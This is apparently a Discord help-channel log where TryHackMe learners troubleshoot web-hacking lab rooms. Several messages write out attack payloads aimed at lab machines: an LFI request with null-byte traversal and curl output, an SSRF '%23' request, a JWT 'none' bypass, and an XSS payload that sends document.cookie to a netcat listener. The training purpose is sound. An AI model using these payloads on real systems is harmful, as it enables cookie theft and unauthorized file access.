I have to receive a flag after visiting unusual endpoint. Tried looking on YouTube etc as well but they don't have this one as their might be some update in this room.

You just need to constantly browse the website, when you hit enough tabs it should open.

I have completed this path Can you guys please suggest some ctf

Any1 has some suggestion for challenges to test my knowledge on different attacks like lfi,sqli,commnad inejct, xxe inject

Have you done all the thm rooms?

Nah but im studying the bug bounty hunter path on hack the box and want to try it on some thm rooms

Im specifically looking for any tryhackme rooms

You can use the search to search for keywords. (Tags)

Yeah even that cant satisfy me

So im here looking for some suggestion

I would appreciate a room similar to owasp juice shop

This one?

https://tryhackme.com/room/nahamstore

Although this is just a medium-rated one.

More please loved this one

Hi, I'm doing upload vulnerabilities room but stuck from the start. I'm using attack box and on thm VM, I'm not able to find /etc/hosts (hosts file). Moreover I'm not able to access web page where I have to overwrite an image file. Any guidance please

You need do sudo nano /etc/hosts

Okay I proceeded, uploaded img but not getting flag

Mountains.jpg file is not there already in Linux places, how I can overwrite it and get the flag

Hi guys! I just launched the Content Discovery room and I´m stuck on the 1st task 😅 🙈 . I can´t figure out where to start; anyone that can give me a hint? Thank you

Task 1?

All answers to Task 1 is inside the Task 1 text. 🙂

Oh, I thought I had to search for them in the website

Thank you so much hahaha

Gave +1 Rep to @restive hemlock (current: #2 - 1883)

Hey everyone, I'm working on the File Inclusion room and made it to Challenge 3, but I got quite stuck. I looked at some solutions online to figure out what I was missing and many of them referred to using Burpe Suite. Burpe Suite looks like it's at the end of this path. Is it expected to skip around and come back? I kind of thought the paths would give me the necessary skills as I approached each room instead of having to bounce around.

Hey, I would assume that you were talking about the LFI challenge in Junior Pentesting Room. Using Burp is not mandatory to edit and resend a HTTP request. You can also use "curl" in a CLI or do it directly from the web-browser's developper tools.

Apologies, I meant the File Inclusion Room, Task 8, Challenge, Flag 3

Nonetheless, I'll think about your advice with respect to the challenge. I've had some distance to the problem so maybe I can figure it out properly

Hello Guys

I am enrolled in Web Fundamentals learning path as a Pro User
By the way, I am a Cyber Practitioner and working for a Canadian firm remotely.

Hello everyone, I am at Web Fundamentals path - Room Content discovery, I do not know where to access pwoer shell in a virtual machine provided by @nocturne trout

Please guide

Have you done the Pre-Security path? It should get you familiarized with the Windows environment.

Hi
I resently passed the Jr pentester course
and realize that i interested in web hacking and mb Networks and ABSOLUTELY NOT in privEsc
What i need to do\learn next?

I think what shadow meant was for you to do the Web Fundamentals path.

evidently...

Hi everyone. In Upload Vulnerabilities is it possible to do it on attack box or only personal VM?

It should be possible on both.

For the rce task in the upload vulnerabilities room shell.uploadvulns.thm won't let me upload a file once I've already done so before?

GET /download?server=localhost:8087/admin%23&id=75482342 HTTP/1.1

Working on my SSRF atm.

why is it %23 for the identifier is that just a common identifier used when using burp to modify get requests for files would it just pull all the files for admin with the request?

%23 is url encode for # which is used to ignore everything in the url that comes after.

That makes sense, added to my new things learnt today cheers dude

hey guys

my /tmp/mount file got bugged, my machine crashed. I can't open it or remove, it just stands on standby for ages. Anyone knows a fix? https://tryhackme.com/r/room/networkservices2 task4

when I do /tmp/mou (press tab) it doesn't complete either, just freezes

rm freezes, sudo rm -rf freezes as well

Hello, I have a ffuf behavior i don't understand. Maybe someone can clarify? In the room authentication bypass, the storyline proposes to pass directly the data (with -d) and the headers (with -H) in the command line. Without a cheatsheet, I dont know which format these should have. So my idea was, intercept the Post message with burp, copy - paste it to a file and use the file (modified) in ffuf with the -request flag. To my surprise this doesn't work correctly. It will populate multiple header entries, and then the match regexp will not match what it is supposed to match unless : (a) I modify the file to only contain a couple of essential headers or (b) use burp as a proxy with the -x param. my point (a) was telling me, maybe some header causes a conflict hence ffuf bugs. but (b) honestly I don't understand why it works. Any insight would be greatly appreciated. Thanks in advance

Hi there! I just completed the "Content Discovery" room and learned about ffuf, dirb, and gobuster. I was wondering if one can use those tools as you please to go interrogating websites, or are there some things to be aware of (that might be common sense to cybersec pros but not to noobs like me)?

I still consider myself as a beginner, but before using any tools or doing active recon on any target, make sure that you have explicit and documented approval from the legitimate site or server owner or authorized personnel.

Thanks! this is good info. I wouldn't have thought of this, and kind of wish the tutorials would mention those things.

Gave +1 Rep to @short wave (current: #11 - 640)

There should be a room for it if I remember correctly.

Ah, I haven't made it to that room yet, I'm guessing.

Are you currently subscribed to THM? If not, you may check the PTES (particularly the pre-engagement section).

I am. I'm not sure what you mean by PTES? Is this a room/learning path?

http://www.pentest-standard.org/index.php/Main_Page

👍

http://webapp.thm/get.php?file=userCV.pdf hi guys , just started file inclusion module . i got confused by the intro which it says that get.php is the file name but the file we are looking for is usercv.pdf instead. can anyone explain to me please ? thanks

If you look at the URL closely, you would see that get.php is vulnerable to file inclusion thus allowing you to see the contents of userCV.pdf.

So get.php is the file for the web app and usercv.pdf is stored inside it ?

userCV.pdf is stored in the web server where get.php is hosted / served from.

Depending on what filters are defined within get.php, you should be able to retrieve files so long as the context within which the web server runs has access to the files at the server.

hello , can someone explain why the url has 4 ../ when the current path is /var/www/html ?

that's a feature related to the way the website operates
it basically implements the cd .. feature
in this case the .. routes refer to the parent element
it's a routing feature
-> that's what seems to be the case from a slight looking, I'm not even dipping deeper
-______
although the basis of my logic is solid, there's a slight chance the mechanism is slightly different
for you to identify the right mechanism, you have to display minor problem solving skills to identify the logic that fits towards said behavior
or the pattern that fits
forming a conjecture of how it works
once the conjecture is thoroughly tested, it can be turned into a PoC of the whole logical sequence behind said behavior
*** I hope I didn't make any typos or semantic mistakes
---_- The senpais here should know better than me though

­ ­­
__========================================

・

retyping my question:

is there a legit way to bypass TrustedTypes
aside from reversing the createPolicy process
apart from finding out how the createPolicy process is made and trying to reverse it x inject it
is there a legit way ?
back in the trustedTypes github issues there were a lot of cases of bypass and I believe all of them if not most got all remediated

manual bypass ☑️

• [ ] Dynamic Bypass as mentioned above ( when I have time, I'll see what I can do )

Hi guys

I wanted to thank all the creators of the Web Fundamentals pathway for this enlightening content and engaging +challenging labs

Especially Muira. His Upload Vulnerabilities Room was awesome, especially the challenge

Just finished DNS in Detail in How the web works & just curious why the second (nonauthoritative) value is the correct answer rather than the first one given.

Also I can't help wondering if the transporter in Star Trek wasn't using HTTP with TCP to "lock on" to whatever was being sent but that's not possible if HTTP was only invented in 89-91 by Mr Berners-Lee & then I remembered that yes! packet switching had been around long before then!

One last question from http in detail - how is it possible that Content-Length is 0 for all of these?

I think because you're PUTting a user and not a file

Path traversal technique, it's not so easy to explain unless you seek out to learn and understand yourself
The /../ is used for traversing or moving around directories or paths and the number of ../ used is determined by how deep in a directory or path you're in and where you see trying to traverse to

Like if you're in the /home/user/desktop directory and you are trying to move to /root directory, then you'll move 2 directories back like so../../ and then you'll specify the directory you're moving to, so the final command will be ../../root

I hope this example is helpful to some length

regarding XSS room, I'm a bit confused about the classification of reflected and DOM-based. For example, task 7 level 4, is it considered DOM-based since javascript sink innerHTML is used to called the input text? However the input in directly reflected in the page source instead of using JS function as the source like window.location.search, so is it a reflected XSS?

I’m about to tackle the Pickle Rick CTF. Where can I find a general cheat sheet for CTFs on TryHackMe? Thank you very much, and Happy New Year!

I'm not sure if there is one, but there are a lot of cheatsheets you can find using Google. Also, as you work on your methodology, you may have to create your own cheatsheets.

Thanks

i am currently in the Upload Vulnerabilities room and using my own VM. i have edited /etc/hosts as directed in Task 1 but i still cannot access the target servers. i keep getting this google page. olease i need some help.

http://java.uploadvulns.thm/

enter this in url bar

thanks a lot, it worked. silly me was not including http:// in the url bar

Gave +1 Rep to @sacred dome (current: #3 - 2069)

Thanks @robust spade

Gave +1 Rep to @robust spade (current: #2677 - 1)

lol this is kinda weird

in Web Application / Pentesting
Authentication /Enumeration & Brute Force, no password reset token is valid from 000 to 999. they all have the same repsonse lenght. is this a bug?

Can you please verify and provide a screenshot 🙂 ?
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Can you share the room link?

would this path be good enough to refresh for a web app security internship?

Finish Web App Pentesting path after this one

This one is pretty basic

is there something broken with the CORS & SOP room? i cant complete the regex task and im following it to the T, all i had to change was one thing and the first abitrary task worked so...? am i doing it wrong?

nvm i figured out the problem 😄

I'm planning to study bug bounty starting with IDOR and SSRF, I wouldn't mind people joining with me 🙂

File inclusion room and I'm unable to get the flag3 kindly help

Actually, try without %25. So, just use %00 at the end

Ok

Did that work?

No

Try to add null payload at the end , also that URL contains way too much / , you need only one

It's still not working

Try:

POST /challenges//////////chall3.php?file=welcome HTTP/1.1
Host: 10.10.106.118
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://10.10.106.118/challenges/////////chall3.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

file=../../../etc/flag3%00

Btw, the Content-* headers are important, and %2500 won't work as the site doesn't support double decoding (as most modern PHP setups don't).

I would correct it to /challenges/chall3.php?file=../../../../../../../flag3%00

There's to much / after challenges in that URL

It should even work without ?file=

This works as well (curl method):

$ lfi=$(printf '../../../../../../etc/flag3' | yq -r @uri) ; curl -v --trace-ascii - -d file=${lfi}%00 -H "Content-Type: application/x-www-form-urlencoded" http://10.10.189.167/challenges/chall3.php --output -
Warning: --trace-ascii overrides an earlier trace/verbose option
== Info:   Trying 10.10.189.167:80...
== Info: Connected to 10.10.189.167 (10.10.189.167) port 80
== Info: using HTTP/1.x
=> Send header, 168 bytes (0xa8)
0000: POST /challenges/chall3.php HTTP/1.1
0026: Host: 10.10.189.167
003b: User-Agent: curl/8.13.0
0054: Accept: */*
0061: Content-Type: application/x-www-form-urlencoded
0092: Content-Length: 49
00a6: 
=> Send data, 49 bytes (0x31)
0000: file=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fflag3%00
== Info: upload completely sent off: 49 bytes
<= Recv header, 17 bytes (0x11)
0000: HTTP/1.1 200 OK

I don't know what mistakes I'm making here

You are missing the Content-Type header

Even still not working bro

show pls

your content-type header is incomplete

should be

Content-Type: application/x-www-form-urlencoded

Not working bro

Content-type should be 1 line, not 2

Like this

Bro 🥲

URL is wrong

delete all those / after challenge3

also you don't need file parameter in URL since this is a POST request you can have it in body

It's fresh link

Btw, your "Like this" screenshot was missing etc/ in the file path. It would've worked otherwise 😀

No

I'm share fresh link that all

I'm referring to the screenshot before that

@molten ibex This is as close as possible to the request you had before and shows that it works:

You still have /// use just /

It's not working

Finally woked

🥳

👍

Yeah, that content-type header is really important

And true you have too many slashes (/) and no need to have ?file= in the POST url, but it will still work regardless.

so im not sure if this is where i go for this, but i am currently very stuck in this project. Am I doing something wrong with the string?

You're printing fixed Text "... included shipping is 52.8" and then just adding the basket cost to it which is wrong

also you mentioned that the customer_basket_cost is 34 again in your if/else statement, which is a duplicate, since you already have the variable set above

Instead you should update the basket cost with the shipping cost and then just print the basket cost

understood, thank you

Gave +1 Rep to @lyric sluice (current: #234 - 36)

so in the OWASP API Security Top 10 - 1 room

the question

this is the response I am getting

nvm

mb

Hi everyone, I need help with passing a task in SQL Injection room

https://dontasktoask.com/

For future reference

What question are you having issues with?

Hey Im starting the Walking an application room for web fundamentals, I've launched the machine but the URL it wants me to go to isn't loading at all

nvm

burp make it look easy

hi all,

I'm doing IDOR section and currently stuck at task 7
i'm supposed to change the value of id to 1,2 or 3 instead of 50 in customer?id=50
went to Network --> clicked on said path --> Response --> right-clicked on 50 and chose "Override Content" --> saved file in Documents

now i'm refreshing the page but nothing is happening

I know i'm deffo doing it wrong, but what am i missing ?
dont' want to do it with any other tools other than Chrome

appreciate your help/tips in advance!

=======================================

I just copied the Request URL and pasted it in the address bar and changed id to 1, and it gave me what i wanted

would love knowing other methods as well

found another way: Firefox (Edit and Send)

can i DM someone for the LFI challenges ?

What is the issue ?

Challenge 1:
I changed GET to POST and went on trial and error but nothing is happening

no errors at all to indicate anything

Challenge 2:
changed THM to admin (made sure it was small case because "Admin" gives an error
so i think from here, it's only also trial and error but nothing is happening either

How did you change the method ?

from Firefox

Network tab

right-click on "Edit and resend"

one moment, i'm re-opening the box now

even tried it with Burp Suite, but still nothing

alright, i'm in the box now

it seems that i can't send screenshots in here

so i change GET to POST in Network tab
and add the file traversal in the url; like so (this is for challenge 1):
http://10.10.138.81/challenges/chall1.php?file=../../../../etc/flag1

the response is still the same, nothing new happens

by any chance, is there something wrong with the challenges ?

or am i doing something wrong or missing something ?

No , there isn't I went through the challenge last week and it works perfectly fine , provide some screenshots of what you're doing

i can't send screenshots

are new users unable to send screenshots ?

managed to do challenge 2

You need to verify in order to upload screenshots

done!
thank you

so

for challenge 1

writing anything in File Name doesn't bear any fruit
changing GET to POST (via Burp Suite) and sending it manages to get a 200 OK response.
but i notice that the form action method is always GET; like so:

the form action, is it relevant ?

yes!

it is relevant, i've been changing it in the wrong place!

managed to solve challenge 3 for LFI, but i have a question in it

why did it work with curl and not in the browser ?

changed GET to POST in <form action= ".//chall3.php" method="GET"> (this is when i realised that the filter stops working when we change the method to POST)

but still, in File Name in the browser, whenever i input ../../../../etc/flag3%00, it still showed the error and nothing new was taking place

but when i tried it with curl (here is the command: curl http://10.10.3.176/challenges/chall3.php -X POST -d 'file=../../../../etc/flag3%00' --output /root/Desktop/flag3.txt
it worked just fine

so definitely i was doing something wrong in the browser or missing something

i was using Firefox btw

Burp Suite was a deadend to me (not sure either if i was doing something wrong in it)

Hello there,
having trouble with https://tryhackme.com/room/xss

final task, i created a listener with nc -nlvp 9001 and injected the following payload in the support ticket:
</textarea><script>fetch('http://0.0.0.0:9001?cookie=' + btoa(document.cookie) );</script>

been waiting for more than 15 mins and nothing is happening

i can't pinpoint what is wrong here, would appreciate additional eyes

no one from the mods seems to care responding, i see

Mods are volunteers , they're here to moderate the conversation on server not to help with room problems

Change that 0.0.0.0 ip to the actual ip of your attackbox

duly noted, apologies

thx, will give it a go now

Gave +1 Rep to @sacred dome (current: #1 - 5631)

Also this is a global server , there's a high chance that many people are from a different time zone than you

you're right

i was a bit frustrated with having no responses

sorry again

Hi, im doing the "Blog" Challange room to test my learnings from this Path. I Think im doing preatty good so far (Went down the Rabbit hole) and got the Creds for one of the Users now i want to Use metasploit with the "multi/http/wp_crop_rce" exploit. It seems to work first but then it the remote Session dies (Screenshot), am i missing sth? I took a look at the writeups after a while but they did the same as I

Did you put in a port as part of the options? It was on ||9000|| if I remember correctly.

Ahh that makes sense i used the default 4444 metasploit port

Ok, it worked after Changing LPORT to 9000

I want a dedicated path to build career in Android and IOS penetration testing

There's no such path on THM yet , however you can suggest it in #room-ideas or #feedback-and-ideas channels 🙂

If I learn Web-Application Attacks(intermediate) will this also help me Android pentesting?

Yeah it will help but you will also need to learn some stuff related to Android environment like Android studio , etc.

hi all,

i'm having an issue with Task 20 in owasptop102021, also in web-hacking-1

I login as guest with password guest as well.
I get the JWT token, remove the signature and modify the header with 'none' and the payload with 'admin'.
I refresh the page but it keeps giving out 'Either the token or its signatrue is invalid, no flag for you'.

I'm pretty sure that everything is right.

Can you decode it in cyberchef and send us that screenshot please 🙂 ?

i managed to pinpoint my mistake:
apparently when you modify the jwt token and remove the signature, you have to leave a dot right after the payload
so that did it

im trying to complete this web fundament path so guys help me ..........

where are you stuck in the path ?

I'm new to cyber security

Allmost everything!! I do start one path , getting frustrated 🥴

you will have to be more precise

When I planned to start a path for network labs in THM , I DO ET TRIED of finding vulnerability in the lab I can't find even the easy one 🕜 it getting me frustrated and leave the lab .....

Why does burp doesn't intercept the js file so i can edit it ?
Trying to follow along here
https://tryhackme.com/room/uploadvulns

Disable interceptor

I have a valid token from a vulnerable endpoint and need to pass it to /apirule2/user/details

How would I do that in Talend API Tester?

... It wasn't Authorization, it was 🥲

Can you advise which THM room is this from so folks who want to help would have an idea where this came from?

Honestly I don't know if I missed something in front of my eyes or not, but fiddling around for an hour~ I finally figured it out. As far as I can tell "Authorization-token" as a header is not common or standard, hence why "Authorization" is the only one that autocomplete in Talend API tester. Then again I'm the noob here, so I could be very wrong.

The hint given is "Get a valid token from a vulnerable endpoint and pass it to /apirule2/user/details." and was, at least for me, no help at all as the hint was the most obvious part to solving this.

Please let me know how and where I should have figured out to use "Authorization-token" if anyone have the time to look at it. If not then meh, it was an annoying hour, but I solved it and have now moved on, but I'm always open to learning if there was something I missed.

https://tryhackme.com/room/owaspapisecuritytop105w
Task 4 - Vulnerability II - Broken User Authentication (BUA)
To which country does sales@mht.com belong?

hello i have a issue in the Task 5 https://tryhackme.com/room/owaspjuiceshop the flag doesnt work

question 3

I resolved that

Hello, currently in the owasp juice shop module and stuck on the 2nd question. I've followed the steps as explained but am unable to get the xss to trigger.

Can you provide some shots ?

i can't go through the OWASP juice shop XSS persistent injection

I add the header when I logout

but then I log in and go to check my IP, which is still the same and not an xss injection

can someone help me ?

Someone else probably already done that, I think you’d have to wait till it resets

what ?

i genuinely didn't understand what you meant by that

Are u running it thru website? If so other people will access the website too

If u run it on a docker for example you could solve all the tasks without other people involving

have you already used tryhackme ?

the machine that you start is personal

"Meterpreter session 1 closed. Reason: Died". I had problem to establish meterpreter session that was closed down after few seconds. That's the exercise generated for Metasploit: Exploitation - Task 6 Msfvenom. Any advice or suggestion is appreciated.

Can you please verify and provide some shots of your metasploit options 🙂 ?

Someone having connection problem in the Uploadvulns room @nocturne trout help

did you edit /etc/hosts as instructed in room material?

Yes, even editing and I also tested it on Attackbox

do you have a situation similar to reported here, i. e. sometimes the room does not work, and then does a bit later?:

• https://discord.com/channels/521382216299839518/1414933047941267466
• https://discord.com/channels/521382216299839518/1414530336737460345

I'll test it again and if it doesn't work I'll forward an email, thank you

Gave +1 Rep to @halcyon imp (current: #13 - 810)

apparently it returned to normal, but I sent an email before with the error

thanks for the feedback
I have experienced the same: not working 10-15 minutes ago, working now 🙃

Gave +1 Rep to @mint wedge (current: #3157 - 1)

Y m not seein' the file main-es2015.js

it's main.js, you just find "admin" and you'll see

guys, i get into trouble in Upload Vulnerabilities room: https://tryhackme.com/room/uploadvulns
i've followed instructions and tried to edit the hosts, i still can't access the webpage,
i also do that on attacking machine but got stuck
Does anyone completed this room can give me some advice please?

thnx man But i did it before

Have u reached upload vuln room yet?

Im stucking at editing the hosts file

Not yet jus started

Pls lemme know if you can configure the host

Ok lemme see

@crystal flower Hey u done or still stuck

Stuck

Dm. .

@crystal flower

Should I call XSS, http parameter pollution?! Or is this a true name for the vulnerability because I believe it perfectly aligns to the cause of vulnerability!!

No those are two pretty different things 🙂

@sacred dome how come?

Because they're very different in nature . They're completely different types of vulns. XSS is usually a client-side vuln. while HTTP parameter pollution is a server-side vuln.

But what I have learnt so far is that XSS is a vulnerability that initiates from client-side that impacts the server as in a way of corrupted or malicious request, so I believe saying it a parameter pollution would be same in nature and for this notion I am referring to the chapter 12 of the book "real world bug hunting", if you think this is not the case, then how should I think of it?

Hi, I'm new

Anyone connected?

welcome 🙂

Ty

https://tenor.com/view/yay-gif-3322389187415957207

😂

Are you an admin?

no?

Ok

I just want to talk a bit but I don't know good this server

Try #general 🙂

Yeah bro

Hi. I'm trying to complete the web fundamentals OWASP Juice Shop, whenever I type in the codes, it keeps coming up as incorrect even though it's correct saying "The answer you provided may not be in English". Any suggestions?

can anyone tell me why the OWASP Juice shop room images all show this. Im from the UK.

is that for all parts of the room, like all tasks?

the picture seems to be hosted in imgur.com, which is no longer available in the UK as per screenshot
reported yesteray here: #1422647718374936676 message

dammit, yeah all parts of the room are like that. Its really annoying. I cant getg task 7 XSS to produce the flag. I thought maybe there was something in the images that I was missing.

@halcyon imp thanks for the reply.

Gave +1 Rep to @halcyon imp (current: #9 - 958)

So i use <iframe src="javascript:alert('xss')"> in the search bar as instructed. The alert appears on screen, but no flag appears.

same happens on task 8 with True-Client-IP header set and <iframe src="javascript:alert('xss')"> set as the value as instructed, burp itnercept on. Resend request. Login in and view last login IP as instructed. Again, no flag appears.

you can search THM Discord for Juice Shop: lots of user have complained for several areas of that room, and I am afraid you will not have a pleasant time in that room regardless of the imgur issue

@halcyon imp Yeah ive noticed the complaints after having a dig around discord. Kind of sucks considering I need to finish it to complete the web fundamentals path. I dont want to leave a room unfinished.

that room will not get repaired overnight
one suggestion: Juice Shop is available with Kali here: https://www.kali.org/tools/juice-shop/
I have not used it, and I cannot say if the issues seen with THM room are absent with the Kali install
but if you can do the tasks somehow, you can consider you have covered the room material; you then have the option of searching the Internet for some writeups containing the flags, and that way you can finish that room and path

I have 3 tasks left in the room which are pretty simple and I know how to do them. The flags just wont appear for them. I have already had a dig around for writeups last night after 2 hours of trying to get the flags. All the write ups are old. The instructions in the write ups are the exact same as they are in the room. The flags are old though.

@halcyon imp appreciate the replies.

Did you check the scorecard? I was able to get the flags that weren't appearing from there

Hi can anyone help me i am stuck

If you describe where you are stuck and the room, folks will surely help out.

I am currently stuck on question # 2, perform a persistent XSS! and Question #3, perform a relfected XSS from the task "Where did that come from". It appears that the reason for my inability to complete these two questions sucessfully may be due to using Caido instead of Burpsuite to undertake the work of the proxy. Is there anyone out there who is currently using Caido on either of these two tasks. I would use Burpsuite but I find Caido a much better application and up until now it has been working perfectly. 🤔

Guys...can someone help me...the system keeps saying that my answer is wrong in owasp juice shop injection attack, I know my answer is correct,I've checked it with YouTube also, I've completed 96% of the path and I'm stuck here 🥀

Help me decide to focus on learning web development first, because I often get confused when studying cybersecurity and application security

What field are you looking at down the line? If your interest is on application security, learning coding or development will certainly be helpful

Hi everyone, so I have tried this morning to complete the upload vulnerabilities room in try hack me and I have done to the letter everything task 1 has asked me to do, even going as far as completing the Networking room they suggest you complete before commencing this task and I have also added the lines suggested, including the correct IP address to the /etc/hosts file in nano and saved that correctly but it still will not let me connect to the machine. Am I missing something here? 🤔

What attack machine are you using - Attackbox or local VM (kali, parrot, arch, etc.)?

Hi, well I have used both my own VM and the attack box. When I have used my own VM the page it takes me to is a google search page which contains lots of articles about the actual room I am doing. When I try to connect using the Attack Box I have referred to a page which states that I need to read task one and connect to one of the several domains which I have configured the /etc/hosts file with.

Hi sorry, for reference I am running kali linux on my own VM.

The irony I suppose is the instructions you are provided with in task one where we are told that Discord users reserve the right to ignore anyone who skips over the instructions and then cannot connect. I have read, understood and carried out exactly the instructions I was given and I still cannot connect. I am wondering if they have left something out of the instructions. I have been meticulous in configuring the /etc/hosts file as per the instructions on each occasion.

Well I never! I have been adding the domains (together with the IP address of the vulnerable machine) to the end of the /etc/hosts file which is what we are told in the instructions, and I quote "Add the following line in at the end of the file:" is what the instructions state. I have just decided to insert the line after the local host address and before the IPV6 configuration lines and I have successfully connected. Anyone out there who has had the same issues as me may need to re-configure the /etc/hosts file in the same way. Although I am amazed as to why it should actually matter where in the file it actually goes and would have thought that so long as the line is correct it could go at the end, (as per the instructions) or anywhere else.

Iv put the added in all sorts of areas in the file and still not connected. its a shame its the last thing i have to do now and dont want to revert to getting the answers from YouTube because I cant get it to work.:( EDIT - today i tryed and it just worked 🤯

Hi guys,
I'm working on SQL Injection room Task 7. I was wondering if there's a method to automate the '%' cycle to find the correct database name? Without manually trying each alphabet, number, and symbol one by one.

Hi guys, I'm facing the same issue since yesterday night. The first time it worked without any trouble for me with adding hosts mapping to /etc/hosts. But since yesterday night I'm trying to do the same thing but I cannot connect to the vhosts. When I ping annex.uploadvulns.thm I get a response from overwrite.uploadvulns.thm, but I cannot access to overwrite.uploadvulns.thm . I tried to shutdown the vulnerable machine and my attackbox and edit again /etc/hosts but still get same problem.

hi bro ! i've the same issue since the cloudflare problems onthe upload vulnerability room, i think is the same room that's u've encounter problems
even if we add IP and all the vhosts in the /etc/hosts file, we can't acces to the vhosts, just the first page and that's all...
I think we must wait a little bit

Yes I'm on the upload vulnerability room. Ok thanks for you feedback, let's wait then

Gave +1 Rep to @mint ibex (current: #3265 - 1)

if the issue still the same until tommorrow i will contact support team to have more informations

keep me in touch bro

👍

it's up brother, if u want to continue ur hacking training day 🙂

guys, has anyone done Pickle rick challenge, thm won't pick up the flag for question 1 even though i viewed the file like 100 times

have u restart vm ? if u don't try it, sometimes it works

i have restarted it and did the task again, still nothing happened

I need an intership for pentester

What can I do for this

if someone morrocan here

anyone else have issues with burp browser just in eternal limbo when trying to open a url on the attackbox? Going directly to firefox works fine with the same url. I'm in the exploiting race conditions room for reference. Will probably just come back to this room later on in my journey

I've been having the same issue for the race conditions room as well. I've been trying to figure it out for the last 2 days with no luck. If you figure it out man, please let me know.

just to be 100% sure, is Intercept activated or deactivated when trying to access the site via burp browser?

since if activated the request will hang in the proxy until you forward it. Eternal limbo 🙂

That makes sense. So another words, keep deactivated until the page is loaded, then activate and refresh webpage for burp to capture?

Or activate before hitting login when trying to capture login attempt?

exactly. Everytime it's activated all requests will get stuck within Burp for you to edit and/or forward.

Even if it's deactivated you will be able to scroll through the browsing traffic/history in Proxy > HTTP history. Convenient if you realise you wanted an older request or so to read/manipulate/resend

Thank you I appreciate it 🤙🏼

Pls am looking for a cyber security mentor,am in need of someone to work with,help while growing myself

@brave fox @lavish loom amazing! Thanks friends! I haven't tested it yet, but thank you for prompting this a little more and giving things to explore and think about. Little busy today and prioritizing the advent calendar lol, but will get to it soon

Gave +1 Rep to @brave fox (current: #440 - 17)

Gave +1 Rep to @lavish loom (current: #2188 - 2)

https://tenor.com/view/monkey-gif-19600739

I'm having issues with Burp Suite in the OWASP Juice Shop module. I'm able to get all the way to the point where you start the attack in Task # 4.

Once I start the attack and it goes to the part where I'm supposed to filter out, I get a notification stating that burp suite community is limited and just shows a preview. If I push okay, or the x to exit notification, I'm unable to do anything at all to even be able to complete the room.

Any help or direction with this would be highly appreciated 🙏🏼 If I need to go through the tasks and supply screenshots, let me know and I'll DM.

I'm also trying to complete the task through the AttackBox. If that makes a difference, let me know lol.

Is this the Spider feature?

#junior-pentester-path Penetration-Tester

Interested

I can help you with that

@nocturne trout I'm finding it difficult connecting via RDP ,I don't know the computer name I ought to use in Active Directory basics under Managing Users in AD

@calm forge which room are you doing?

You could dm me if you need help!

@royal flower here it seems very common

no fixes? damn

Lets use the search bar to search for a solution here

No solution, @royal flower .

everyone was happy with doing ts in the browser lol

Yeah most likely

Hi, has anyone recently done the RCE section in the upload vulnerabilities room?
It says to navigate to shell.uploadvulns.thm but when I try to load that page I get an error saying this site can't be reached.

Am I missing something?

done

Were you able to access this now?

Yes. There were instructions about DNS configs on a local file which I had missed.

Hi @nocturne trout & @limber sable ,
I am not getting the desired page for solving the room Upload Vulnerabilities . Can you help me with it?
Issue: i am not able to visit the vhosts provided for solving the room. And is getting the default page as show in the snapshots.